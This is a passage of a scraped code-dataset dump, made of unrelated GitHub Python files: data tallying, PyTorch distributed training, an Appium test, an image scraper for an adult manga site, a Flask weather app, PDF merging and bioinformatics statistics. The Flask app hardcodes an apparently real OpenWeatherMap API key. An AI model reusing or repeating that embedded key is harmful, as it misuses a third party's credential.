self.filter(verb=verb)\n","repo_name":"Save22/django-activity-stream","sub_path":"example_project/testapp/streams.py","file_name":"streams.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41892250909","text":"import csv\nimport os\n\npolling_csv = os.path.join(\"..\", \"Resources\", \"election_data.csv\")\n\nelection_output = os.path.join(\".\", \"election_output.txt\")\n\n\n\ndef isNewCandidate(candidates, candidateName):\n for candidate in candidates:\n if candidateName == candidate[\"name\"]:\n return False\n\n return True\n\ndef findCandidateIndex(candidates, candidateName):\n for candidate in candidates:\n if candidateName == candidate[\"name\"]:\n return candidates.index(candidate)\n\ndef printResults(orderedCandidates):\n\tprint(\"Election Results \\n------------------\")\n\tprint(f\"Total Votes:\\t{totalVotes} \\n------------------\")\n\tfor candidate in orderedCandidates:\n\t\tcandidatePct = round(candidate['votes'] / totalVotes * 100,3)\n\t\tprint(f\"{candidate['name']}: \\t{candidatePct}% ({candidate['votes']}) \")\n\tprint(\"------------------\")\n\tprint(f\"WINNER: {orderedCandidates[0]['name']}\")\n\tprint(\"------------------\")\n\ndef printResultsToFile(orderedCandidates, election_output):\n\twith open(election_output, 'w', newline='') as 
txtfile:\n\t\tprint(\"Election Results \\n------------------\", file=txtfile)\n\t\tprint(f\"Total Votes:\\t{totalVotes} \\n------------------\", file=txtfile)\n\t\tfor candidate in orderedCandidates:\n\t\t\tcandidatePct = round(candidate['votes'] / totalVotes * 100,3)\n\t\t\tprint(f\"{candidate['name']}: \\t{candidatePct}% ({candidate['votes']}) \", file=txtfile)\n\t\tprint(\"------------------\", file=txtfile)\n\t\tprint(f\"WINNER: {orderedCandidates[0]['name']}\", file=txtfile)\n\t\tprint(\"------------------\", file=txtfile)\n\t\nwith open(polling_csv,newline=\"\") as csvfile:\n \n csvreader = csv.reader(csvfile, delimiter=',')\n csv_headers = next(csvreader)\n\n totalVotes = 0\n candidates = []\n for row in csvreader:\n totalVotes += 1\n\n if isNewCandidate(candidates,row[2]):\n candidates.append({\n \"name\": row[2],\n \"votes\": 0\n })\n \n idx = findCandidateIndex(candidates,row[2])\n candidates[idx][\"votes\"] += 1\n\n\n\norderedCandidates = sorted(candidates, key=lambda k: k['votes'], reverse=True)\nprintResults(orderedCandidates)\nprintResultsToFile(orderedCandidates, election_output)\n","repo_name":"brianrhackett/python-challenge","sub_path":"PyPoll/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21683421470","text":"import config\nimport time\nimport sys\nimport datetime\nimport torch\nimport torch.fx\nfrom torch.profiler import profile, record_function, ProfilerActivity\nfrom contextlib import nullcontext\nimport numpy as np\n\nfrom torch.nn.parallel import DistributedDataParallel as DDP\n\nfrom utils import *\n\ndef run(global_rank, local_rank):\n import torch.distributed as dist\n dist.init_process_group('nccl', rank=global_rank, timeout=datetime.timedelta(hours=2))\n\n model = config.get_model(seed=39).cuda(local_rank)\n model = DDP(model, device_ids=[local_rank])\n\n # optimizer = torch.optim.SGD(model.parameters(), lr=config.lr)\n optimizer = torch.optim.Adam(model.parameters(), lr=config.lr)\n train_data = config.get_data()[1]\n\n result_times = []\n last_iter_time = time.time()\n for iter in range(config.run_iter):\n optimizer.zero_grad()\n x, y = next(train_data)\n x = x.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n y = y.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n with torch.autocast(device_type=\"cuda\") if config.fp16 else nullcontext() :\n loss = model(x, y) * config.world_size # DDP seems to average the losses\n aggregated_loss = loss.detach().clone()\n dist.reduce(aggregated_loss, 0)\n if global_rank == 0:\n print(f\"loss {iter}:\", aggregated_loss.cpu().numpy() / config.world_size)\n # dist.barrier(device_ids=[global_rank])\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.5)\n # torch.cuda.synchronize()\n optimizer.step()\n # dist.barrier()\n if local_rank == 0:\n iter_duration = time.time() - last_iter_time\n # print(\"iter time: \", iter_duration)\n result_times.append(iter_duration)\n # print(\"avg±std:\", np.mean(result_times[-config.avg_iter:]), np.std(result_times[-config.avg_iter:]))\n last_iter_time += iter_duration\n\n print(\"peak memory\", torch.cuda.max_memory_allocated())\n\n if not config.trace:\n return\n\n x, y = next(train_data)\n x = x.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n y = y.chunk(config.world_size, 0)[global_rank].cuda(local_rank)\n with profile(\n activities = [ProfilerActivity.CPU, ProfilerActivity.CUDA],\n # record_shapes = 
True,\n # profile_memory = True,\n schedule = torch.profiler.schedule(wait=1, warmup=10, active=4)\n ) as prof:\n for _ in range(15):\n with record_function(\"forward\"):\n with torch.autocast(device_type=\"cuda\") if config.fp16 else nullcontext() :\n loss = model(x, y)\n with record_function(\"backward\"):\n loss.backward()\n torch.cuda.synchronize()\n with record_function(\"update\"):\n optimizer.step()\n dist.barrier()\n prof.step()\n\n if local_rank == 0:\n # print(prof.key_averages().table(sort_by=\"cuda_time_total\"))\n prof.export_chrome_trace(\"trace.json\")\n\nif __name__ == '__main__':\n ranks = [ int(x) for x in sys.argv[1].split(',') ]\n\n if torch.cuda.device_count() != len(ranks):\n print(\"forget to set CUDA_VISIBLE_DEVICES\")\n raise SystemExit\n\n import os\n os.environ['MASTER_ADDR'] = str(config.master_addr)\n os.environ['MASTER_PORT'] = str(config.master_port)\n os.environ['WORLD_SIZE'] = str(config.world_size)\n\n import torch.multiprocessing as mp\n mp.set_start_method('spawn')\n\n for local_rank, global_rank in enumerate(ranks):\n mp.Process(target=run, args=(global_rank, local_rank)).start()\n\n for p in mp.active_children():\n p.join()\n","repo_name":"ylxdzsw/hidup","sub_path":"exp/ddp.py","file_name":"ddp.py","file_ext":"py","file_size_in_byte":3708,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72510124968","text":"import os\nimport time\nimport unittest\n\nfrom appium import webdriver\n\n\nclass Tests1(unittest.TestCase):\n def setUp(self):\n desired_caps = {\"platformName\": \"Android\",\n \"platformVersion\": \"7.1.2\",\n 'deviceName': 'Redmi 4x',\n 'udid': '192.168.0.103:5555',\n 'appPackage': 'com.miui.calculator',\n 'appActivity': 'com.miui.calculator.cal.CalculatorActivity',\n 'unicodeKeyboard': True,\n 'resetunicodeKeyboard': True,\n 'noReset': True,\n 'deviceReadyTimeout': 120,\n 'newCommandTimeout': 20,\n 'androidDeviceReadyTimeout': 60,\n 'autoAcceptAlerts': True,\n 'autoGrantPermissions': True\n }\n\n self.driver = webdriver.Remote(\n \"http://127.0.0.1:4723/wd/hub\", desired_caps)\n self.driver.implicitly_wait(20)\n\n def testCalculator(self):\n \"\"\"计算器测试\"\"\"\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_7_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"\\r\\nIn step1, press 7\")\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_plus_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"In step2, press +\")\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_1_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"In step3, press 1\")\n self.driver.find_element_by_id(\n 'com.miui.calculator:id/btn_c_s').click()\n self.getScreenShot()\n time.sleep(0.5)\n print(\"In step4, press clear\")\n\n def getScreenShot(self):\n img_folder = os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"..\")) + '//screenshots//'\n ti = time.strftime('%m%d%H%M%S', time.localtime(time.time()))\n screen_save_path = img_folder + ti + '.png'\n self.driver.get_screenshot_as_file(screen_save_path)\n\n def tearDown(self):\n self.driver.quit()\n","repo_name":"xuanyuanchl/AutomationFrameworks","sub_path":"PythonAppiumAndroidFramework/src/Test/test1.py","file_name":"test1.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33258176784","text":"import requests\nimport re\nimport uuid\nfrom bs4 import 
BeautifulSoup\n\n#俺のエロ本URLとコンテンツ番号の取得\nurl = \"http://oreno-erohon.com/content/\"\ncontents = \"174319\";\nr = requests.get(url+contents)\nsoup = BeautifulSoup(r.text,'lxml')\nimgs = soup.find_all('img',src=re.compile('.+725x1024.jpg'))\ni =0\nfor img in imgs: \n print(img['src'])\n r = requests.get(img['src'])\n with open(str('./picture/'+contents+'/')+str(i)+str('.jpg'),'wb') as file:\n file.write(r.content)\n i=i+1\n","repo_name":"yukidevv/ererscript","sub_path":"scr.py","file_name":"scr.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16389474609","text":"# app.py\nfrom flask import Flask, render_template, request\nimport requests\n\napp = Flask(__name__)\n\n# Replace with your own API key from https://openweathermap.org/api\nAPI_KEY = \"269ee17023aaa4f9dbf0dd12f5ab9311\"\n\n@app.route(\"/\")\ndef index():\n return render_template(\"index.html\")\n\n@app.route(\"/weather\", methods=[\"POST\"])\ndef weather():\n city = request.form.get(\"city\")\n url = f\"https://api.openweathermap.org/data/2.5/weather?q={city}&appid={API_KEY}&units=metric\"\n response = requests.get(url)\n data = response.json()\n \n \n if data[\"cod\"] == 200:\n weather = data[\"weather\"][0][\"description\"]\n temp = data[\"main\"][\"temp\"]\n feels_like = data[\"main\"][\"feels_like\"]\n time = data['dt']\n humidity = data[\"main\"][\"humidity\"]\n # dew_point = data['main']['dew_point']\n icon_id = data['weather'][0]['icon']\n icon_url = f\"http://openweathermap.org/img/w/{icon_id}.png\"\n weather_data = {'icon_url': icon_url}\n \n \n # icon = data[\"weather\"][0][\"icon\"]\n return render_template(\"weather.html\", city=city,time=time,weather=weather,weather_data=weather_data, temp=temp, feels_like=feels_like, humidity=humidity)\n else:\n error = data[\"message\"]\n return render_template(\"error.html\", error=error)\n\n# def calculate_dew_point(temperature, humidity):\n# # Implement dew point calculation based on the temperature and relative humidity\n# # You can use various formulas available online for dew point calculation\n# return 0\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"Samdami/Damsweather","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22723795106","text":"\n# łączenie plików PDF ze sobą\nimport glob\nfrom PyPDF2 import PdfReader, PdfMerger\n\nmerge = PdfMerger()\nfiles = glob.glob(\"pdf/*.pdf\")\nfor file in files:\n merge.append( PdfReader(file), pages=(0,1) )\n\nmerge.add_outline_item(\"Test zakładki na stronie nr 1\", 0)\nmerge.write(\"merged.pdf\")\nmerge.close()\n\n","repo_name":"marianwitkowski/BS-PDF-20230222","sub_path":"pdf03-merge.py","file_name":"pdf03-merge.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12495201958","text":"import logging\nimport os\nfrom datetime import datetime\nfrom logging import handlers, Logger, Formatter\nfrom logging.handlers import TimedRotatingFileHandler\n\n\ndef get_logger(tag, date) -> Logger:\n logging.basicConfig(level=logging.INFO)\n _logger: Logger = logging.getLogger(tag)\n\n if os.path.isdir('./log') is False:\n os.mkdir('./log')\n\n file_handler: TimedRotatingFileHandler = handlers.TimedRotatingFileHandler(\n filename=f'./log/{tag}.log.{date}',\n when='midnight',\n 
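# when='midnight' with interval=1 rolls the log over once per day; each\n        # rotated file is named with the '%Y%m%d' suffix assigned below.\n        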
interval=1,\n encoding='UTF-8'\n )\n\n formatter: Formatter = logging.Formatter(\n '%(asctime)s - %(levelname)s - [%(filename)s:%(lineno)d] %(message)s'\n )\n file_handler.setFormatter(formatter)\n file_handler.suffix = \"%Y%m%d\"\n\n _logger.addHandler(file_handler)\n return _logger\n\n\nlogger = get_logger('logger', str(datetime.today())[:10].replace('-', ''))\n","repo_name":"Lob-dev/The-Joy-Of-Python","sub_path":"start-generate-thumbnail/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33557589983","text":"from django import template\n\nfrom pads.models import Pad\n\nregister = template.Library()\n\n\ndef do_get_pads(parser, token):\n try:\n tag_name, as_, var_name = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError(\n \"%r tag requires a single argument - var name\"\n % token.contents.split()[0]\n )\n if as_ != 'as':\n raise template.TemplateSyntaxError(\n \"Format is: %r as VARNAME\" % tag_name\n )\n return GetPadsNode(var_name)\n\n\nclass GetPadsNode(template.Node):\n def __init__(self, var_name):\n self.var_name = var_name\n\n def render(self, context):\n context[self.var_name] = Pad.objects.filter(user=context['user'])\n return ''\n\nregister.tag('get_pads', do_get_pads)\n","repo_name":"komarserjio/notejam","sub_path":"django/notejam/pads/templatetags/pad_tags.py","file_name":"pad_tags.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":1150,"dataset":"github-code","pt":"53"} +{"seq_id":"74696428646","text":"#!/usr/bin/env python\nfrom utils import (load, take, show, bgr, image, like, bounds,\nchannels, crop, scale, color, avail, colorPicker)\n#http://homepages.inf.ed.ac.uk/rbf/HIPR2/log.htm\n#https://en.wikipedia.org/wiki/Unsharp_masking\n#http://www.effbot.org/imagingbook/image.htm\n#http://pythonvision.org/basic-tutorial/\nimport cv2\nimport numpy as np\nfrom PIL import Image\n\n# processing\ndef alias(img,amount): #cheating with a mask\n\tlength, width = bounds(img)\n\tchannel = channels(img)\n\tpost = avail(img)\n\tmask = [[0,0,0],[255,255,255],[0,0,0],\n\t\t\t[255,255,255],[255,255,255],[255,255,255],\n\t\t\t[0,0,0],[255,255,255],[0,0,0]]\n\tresult = find(img,mask,(3,3))\n\treturn result\ndef sharpen(img,amount): #not actually sharpening\n\tresult = like(img)\n\tlength, width = bounds(img)\n\timg = img.load()\n\tresult = result.load()\n\tfor left in range(1,length-1):\n\t\tfor top in range(1,width-1):\n\t\t\tpixel = [0,0,0,0]\n\t\t\tfor l in range(-1,1):\n\t\t\t\tfor w in range(-1, 1):\n\t\t\t\t\tpixel[0] += img[left+l,top+w][0]\n\t\t\t\t\tpixel[1] += img[left+l,top+w][1]\n\t\t\t\t\tpixel[2] += img[left+l,top+w][2]\n\t\t\tresult[left,top] = tuple(pixel)\n\treturn result\n\n# blobbing\ndef group(img):#automatically\n\tlength, width = bounds(img)\n\tresult = like(img).load()\n\timg = img.load()\n\tcolor = [255,255,255,255]\n\ttolerance = [2,2,2,2]\n\tfor inc in range(1,127): # this is really really slow / iterative\n\t\tfor x in range(length):\n\t\t\tfor y in range(width):\n\t\t\t\tmatches = 0\n\t\t\t\tif (abs(img[x,y][0] - color[0]) < tolerance):\n\t\t\t\t\tmatches += 1\n\t\t\t\tif (abs(img[x,y][1] - color[1]) < tolerance):\n\t\t\t\t\tmatches += 1\n\t\t\t\tif (abs(img[x,y][2] - color[2]) < tolerance):\n\t\t\t\t\tmatches += 1\n\t\t\t\tif matches > 3:\n\t\t\t\t\tresult[x,y] = tuple(color)\n\treturn result\ndef find(img,mask,dims): # this isn't actually blobbing 
anything\n\tlength, width = bounds(img)\n\theight, breadth = dims\n\tresult = like(img)\n\timg = img.load()\n\theight = int(height / 2)\n\tbreadth = int(breadth / 2)\n\tfor l in range(height,length-height):\n\t\tfor w in range(breadth,width-breadth):\n\t\t\tpixel = img[l,w]\n\treturn result\n\n# metadata\ndef edge(img):\n\tavails = avail(img)\n\tresult = like(img).load()\n\tlength,width = bounds(img)\n\timg = img.load()\n\tfor a in range(0,len(avails)):\n\t\tav = avails[a]\n\t\tfor x in range(0,length):\n\t\t\tfor y in range(0,width):\n\t\t\t\tif av == img[x,y]:\n\t\t\t\t\tresult[x,y] == av\n\treturn result\ndef center(blob):\n\tim = cv2.imread(\"samples/abstract/colors.png\", cv2.IMREAD_GRAYSCALE)\n\tdetector = cv2.SimpleBlobDetector()\n\tkeypoints = detector.detect(im)\n\tim_with_keypoints = cv2.drawKeypoints(im, keypoints, np.array([]), (0,0,255), cv2.DRAW_MATCHES_FLAGS_DRAW_RICH_KEYPOINTS)\n\tcv2.imshow(\"Keypoints\", im_with_keypoints)\n\tcv2.waitKey(0)\ndef distance(img,point):\n\tresult = (0,0,0) # 3d grid\n\treturn result","repo_name":"jarulsamy/HackCamera","sub_path":"src/proto.py","file_name":"proto.py","file_ext":"py","file_size_in_byte":2700,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"22558050755","text":"import os\nimport pandas as pd\nimport scipy.stats as stats\nfrom functools import partial\nimport statistics\nimport matplotlib\nmatplotlib.use('agg')\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nsns.set(style=\"white\")\nimport itertools\nfrom scipy.stats import gmean\n\n\ndef read_metagene_group(group_txt, format='gene2group'):\n if format != 'gene2group':\n result_dict = dict()\n with open(group_txt) as f:\n for line in f:\n metagene, genes = line.strip().split('\\t', 1)\n genes = [y.strip() for x in genes.split() for y in x.strip().split(',')]\n if metagene in result_dict:\n raise Exception(f\"{metagene} duplicated, please check it!\")\n else:\n result_dict[metagene] = genes\n else:\n result_dict = read_sample_group(group_txt)\n return result_dict\n\n\ndef read_sample_group(group_txt):\n group_df = pd.read_csv(group_txt, sep=None, engine='python', header=0, index_col=0)\n group_dict = dict()\n for scheme in group_df:\n tmp_dict = dict(list(group_df.loc[:, [scheme]].groupby(scheme)))\n for group, df_val in tmp_dict.items():\n if df_val.shape[0] == group_df.shape[0]:\n raise Exception('In column of {}, only one group was found!'.format(scheme))\n group_dict[group] = sorted(df_val.index)\n return group_dict\n\n\ndef read_compare_info(cmp_info, group_dict):\n with open(cmp_info) as f:\n cmp_list = list()\n error_names = list()\n for line in f:\n if line.startswith(\"#\") or not line.strip():\n continue\n tmp_ctrl, tmp_test = line.strip().split()\n if tmp_ctrl not in group_dict:\n error_names.append(tmp_ctrl)\n if tmp_test not in group_dict:\n error_names.append(tmp_test)\n cmp_list.append((tmp_ctrl, tmp_test))\n if error_names:\n print(f'Please be aware that Each group name of {error_names} is not in group dict!')\n cmp_list = sorted(list(set(cmp_list)))\n return cmp_list\n\n\ndef score_metagene(exp_matrix, metagene_dict:dict, score='geometric_mean'):\n exp_df = pd.read_csv(exp_matrix, header=0, index_col=0, sep=None, engine='python')\n score_df = pd.DataFrame(columns=exp_df.columns)\n valid_member_list = list()\n for metagene, genes in metagene_dict.items():\n intersect = set(genes) & set(exp_df.index)\n if intersect:\n valid_members = ','.join(intersect)\n 
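# Worked example: a metagene whose two detected members have expression\n            # 4 and 16 scores gmean = sqrt(4 * 16) = 8; the arithmetic mean would be 10.\n            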
valid_member_list.append(valid_members)\n meta_exp = exp_df.loc[intersect]\n if score == 'geometric_mean':\n meta_score = meta_exp.apply(stats.gmean, axis=0)\n else:\n meta_score = meta_exp.mean(axis=0)\n score_df.loc[metagene] = meta_score\n else:\n print(f'None member of metagene \"{metagene}\" is in expression matrix')\n score_df['members'] = valid_member_list\n score_df.set_index('members', append=True, inplace=True)\n return score_df\n\n\ndef diff_test(score_df, group_txt, compare_txt, method='mannwhitneyu', equal_var=True, prefix='',\n box_x='gene', box_xlabel='MetaGene'):\n group_dict = read_sample_group(group_txt)\n cmp_list = read_compare_info(compare_txt, group_dict)\n for ctrl, test in cmp_list:\n if not(ctrl in group_dict and test in group_dict):\n print(f'skip {ctrl} and {test} for both or one of them are/is not in group info dict!')\n continue\n ctrl_samples = group_dict[ctrl]\n test_samples = group_dict[test]\n print(ctrl_samples)\n print(test_samples)\n ctrl_num = len(ctrl_samples)\n target_data = score_df[ctrl_samples+test_samples]\n centered = target_data.sub(target_data.mean(axis=1), axis=0)\n mean_centered = pd.DataFrame()\n mean_centered[test] = centered[test_samples].mean(axis=1)\n mean_centered[ctrl] = centered[ctrl_samples].mean(axis=1)\n\n if method == 'ranksums':\n test_func = stats.ranksums\n elif method == 'mannwhitneyu':\n test_func = stats.mannwhitneyu\n elif method == \"wilcoxon\":\n test_func = stats.wilcoxon\n elif method == 'ttest_ind':\n if equal_var:\n test_func = stats.ttest_ind\n else:\n test_func = partial(stats.ttest_ind, equal_var=False)\n else:\n raise Exception(f'{method} is not supported! '\n f'Choose one of [ranksums, mannwhitneyu, wilcoxon, ttest_ind')\n test_df = pd.DataFrame()\n test_df['pvalue'] = target_data.apply(lambda x:test_func(x[:ctrl_num], x[ctrl_num:])[1], axis=1)\n ctrl_median_exp = target_data[ctrl_samples].apply(statistics.median, axis=1)\n test_median_exp = target_data[test_samples].apply(statistics.median, axis=1)\n test_df[ctrl+'_median'] = ctrl_median_exp\n test_df[test+'_median'] = test_median_exp\n test_df['median_log2FC'] = test_median_exp - ctrl_median_exp\n test_df['regulation'] = 'down'\n test_df.loc[test_df['median_log2FC']>0, 'regulation'] = 'up'\n test_df = test_df.join(target_data)\n test_df.sort_values(by='pvalue', inplace=True)\n test_df.to_csv(f'{prefix}{ctrl}_vs_{test}.metagene.{method}.xls', sep='\\t')\n # plot box\n box_data = target_data.loc[test_df.index]\n box_data.index = [x for x, _ in box_data.index]\n group_df = pd.DataFrame({f'{ctrl}_vs_{test}': [ctrl] * len(ctrl_samples) + [test] * len(test_samples)},\n index=ctrl_samples + test_samples)\n expr_box_plot(box_data, group_df, x_col=box_x, xlabel=box_xlabel, prefix=prefix)\n # plot multiline\n mean_centered = mean_centered.loc[test_df.index]\n mean_centered.index = [x[0] for x in mean_centered.index]\n plot_exp_lines(mean_centered, out=f'{prefix}{ctrl}_vs_{test}.metagene.mean_centered.png')\n\n\ndef metagene_diff(exp_matrix, metagene_group, sample_group, compare, prefix='',\n metagene_group_format='gene2group', score='geometric_mean',\n method='mannwhitneyu', equal_var=True, box_x='gene',\n box_xlabel='MetaGene'):\n \"\"\"\n 给定表达矩阵, 样本分组信息和基��分组信息(metagene) 以及比较信息, 对meta基因做差异检验\n :param exp_matrix: 表达矩阵文件路径\n :param sample_group: 样本分组信息路径, 第一行为header\n :param metagene_group: 基因分组信息,也即metagene信息文件路径. 
文件无需header, 内容有两种格式可选:\n (1) 第一列为metagene名,第二列为metagene的members,用逗号隔开 (2)第一列为基因名,第二列为metagene名\n :param compare: 分组比较信息,第一列为对照组,第二列为实验组/测试组\n :param prefix: 输出文件的前缀\n :param metagene_group_format: gene2group表示第二种格式, group2gene表示第三种格式\n :param score: 计算metagene score的方式, 默认geometric_mean, 即计算members的几何平均值,否则为算术平均值\n :param method: 检验方法, 默认'mannwhitneyu', 还有[ranksums, wilcoxon(配对比较时可选用), ttest_ind]可选\n :param equal_var: method为ttest_ind时可以指定的参数,默认做假设等方差检验\n :param box_x: 画box图的参数 横轴以基因为单位(默认), 另可指定为sample, 此时横轴以sample为单位\n :param box_xlabel: 画box图的参数 横轴的label, 默认为MetaGene\n :return:\n \"\"\"\n # score\n metagene_group_dict = read_metagene_group(metagene_group, format=metagene_group_format)\n metagene_score_df = score_metagene(exp_matrix, metagene_group_dict, score=score)\n\n # test\n diff_test(metagene_score_df, sample_group, compare,\n method=method, equal_var=equal_var, prefix=prefix)\n # plot box\n box_data = metagene_score_df.copy()\n box_data.index = [x for x, _ in box_data.index]\n expr_box_plot(box_data, sample_group, x_col=box_x, xlabel=box_xlabel, prefix=prefix)\n\n # plot multiline\n centered_score = metagene_score_df.sub(metagene_score_df.mean(axis=1), axis=0)\n mean_centered_score = pd.DataFrame()\n for group, samples in read_sample_group(sample_group).items():\n mean_centered_score[group] = centered_score[samples].mean(axis=1)\n mean_centered_score.index = [x[0] for x in mean_centered_score.index]\n plot_exp_lines(mean_centered_score, out=f'{prefix}all.metagene.mean_centered.png')\n\n\ndef _plot_multiline(data, out='multiline.png', annotate_at_end=False):\n colors = ['b', 'r', 'g', 'y', 'c', 'pink', 'm', 'grey', 'darkgrey']\n line_style = ['-', '-.', ':']\n cmbs = list(itertools.product(colors, line_style))\n plt.figure(figsize=(7, 8))\n for ind, index in enumerate(data.index):\n plt.plot(\n range(data.shape[1]),\n data.loc[index],\n label=index,\n color=cmbs[ind][0],\n linestyle=cmbs[ind][1],\n marker='o',\n markeredgecolor=cmbs[ind][0],\n markerfacecolor='w',\n markersize=5\n )\n if annotate_at_end:\n plt.annotate(\n index,\n xy=(data.shape[1]-1, data.loc[index][-1]),\n fontsize=5\n )\n plt.xticks(range(data.shape[1]), data.columns)\n plt.xlim(-0.2, data.shape[1]-1+(data.shape[1]+1)*0.32)\n if not annotate_at_end:\n plt.legend(loc=1, fontsize='xx-small')\n plt.savefig(out, dpi=300, bbox_inches='tight')\n plt.close()\n\n\ndef plot_exp_lines(data, index_col:list=0, sample_group=None, annotate_at_end=False,\n group_order:list=None, out='multiline.png'):\n if sample_group is not None:\n group_df = pd.read_csv(sample_group, index_col=0, header=0, sep=None, engine='python')\n group_names = set(group_df.iloc[:, 0])\n if group_order is None:\n group_names = sorted(list(group_names))\n else:\n group_names = group_order\n if type(data) == str:\n data = pd.read_csv(data, index_col=index_col, header=0, sep=None, engine='python')\n centered = data.sub(data.mean(axis=1), axis=0)\n mean_centered = pd.DataFrame()\n for name in group_names:\n target_samples = list(group_df.loc[group_df.iloc[:, 0]==name].index)\n mean_centered[name] = centered[target_samples].mean(axis=1)\n # print(geometric.mean(axis=1))\n plot_data = mean_centered\n else:\n if type(data) == str:\n plot_data = pd.read_csv(data, index_col=index_col, header=0, sep=None, engine='python')\n else:\n plot_data = data\n\n _plot_multiline(plot_data, out=out, annotate_at_end=annotate_at_end)\n\n\ndef expr_box_plot(expr_matrix, sample_group, x_col='gene', xlabel=None, prefix=''):\n if type(expr_matrix) == str:\n data = 
pd.read_csv(expr_matrix, header=0, index_col=0, sep=None, engine='python')\n    else:\n        data = expr_matrix\n    data.index.name = 'Gene'\n    data = data.reset_index('Gene')\n    data = data.melt(id_vars=['Gene'], var_name='Sample', value_name='Expression')\n    if type(sample_group) == str:\n        group = pd.read_csv(sample_group, header=0, index_col=0, sep=None, engine='python')\n    else:\n        group = sample_group\n    group.index.name = 'Sample'\n    group_names = group.columns\n    group.reset_index('Sample', inplace=True)\n    data = data.merge(group, on='Sample')\n    data.to_csv(f'{prefix}metagene.expr.csv')\n    # print(data.head())\n    for name in group_names:\n        if x_col.lower() == 'gene':\n            ax = sns.boxplot(x='Gene', y='Expression', hue=name, data=data)\n        else:\n            ax = sns.boxplot(x='Sample', y='Expression', hue=name, data=data)\n        ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize=6, rotation=90)\n        if xlabel:\n            ax.set(xlabel=xlabel)\n        plt.savefig(f'{prefix}{name}.boxplot.png', dpi=300, bbox_inches='tight')\n        plt.close()\n\n\nif __name__ == '__main__':\n    from xcmds import xcmds\n    xcmds.xcmds(locals(), include=['metagene_diff'])\n\n","repo_name":"gudeqing/biodev","sub_path":"smallScripts/metagene_diff.py","file_name":"metagene_diff.py","file_ext":"py","file_size_in_byte":12166,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37425317648","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django import template\nfrom django.test import TestCase\nfrom django.test.client import RequestFactory\nfrom django.test.utils import override_settings\n\nfrom labJS.base import Labjs\nfrom labJS.templatetags.labjs import LabjsNode, Wait\n\n\nclass FakeNode(object):\n\n    def render(self, context):\n        return 'some content'\n\n\nclass TestLabjs(TestCase):\n\n    def test_split_contents_empty_content(self):\n        lab = Labjs('')\n        self.assertFalse(lab.split_contents())\n\n    def test_split_contents_non_js_content(self):\n        lab = Labjs('<div><p>I am not JS</p></div>')\n        self.assertFalse(lab.split_contents())\n\n    def test_split_contents_inline(self):\n        lab = Labjs('<script>document.write(\"Hello world\");</script>')\n        self.assertEqual(\n            lab.split_contents(),\n            [{'data': 'document.write(\"Hello world\");', 'type': 'inline'}]\n        )\n\n    def test_split_contents_script(self):\n        lab = Labjs('<script src=\"/static/script.js\"></script>')\n        self.assertEqual(\n            lab.split_contents(),\n            [{'data': '/static/script.js', 'type': 'script'}]\n        )\n\n    def test_render_output_inline_contains_script(self):\n        lab = Labjs('<script>document.write(\"Hello world\");</script>')\n        self.assertIn('document.write(\"Hello world\");', lab.render_output())\n\n    def test_render_output_script_contains_src(self):\n        lab = Labjs('<script src=\"/static/script.js\"></script>')\n        self.assertIn('/static/script.js', lab.render_output())\n\n\nclass TestLabjsNode(TestCase):\n\n    @override_settings(LABJS_DEBUG_TOGGLE='labjs')\n    def test_debug_mode_no_request_context(self):\n        node = LabjsNode(None)\n        context = {}\n        self.assertFalse(node.debug_mode(context))\n\n    @override_settings(LABJS_DEBUG_TOGGLE='labjs')\n    def test_debug_mode_no_toggle(self):\n        node = LabjsNode(None)\n        context = {\n            'request': RequestFactory().get('/'),\n        }\n        self.assertFalse(node.debug_mode(context))\n\n    @override_settings(LABJS_DEBUG_TOGGLE='labjs')\n    def test_debug_mode_with_toggle(self):\n        node = LabjsNode(None)\n        context = {\n            'request': RequestFactory().get('/?labjs=1'),\n        }\n        self.assertTrue(node.debug_mode(context))\n\n    @override_settings(LABJS_DEBUG_TOGGLE=None)\n    def test_debug_mode_setting_undefined(self):\n        node = LabjsNode(None)\n        context = {\n            'request': RequestFactory().get('/?labjs='),\n        }\n        self.assertFalse(node.debug_mode(context))\n\n    @override_settings(LABJS_ENABLED=False)\n    def test_disabled_leaves_content_as_original(self):\n        node = LabjsNode(FakeNode())\n        context = {\n            'request': RequestFactory().get('/?labjs='),\n        }\n        self.assertEqual(node.render(context), 'some 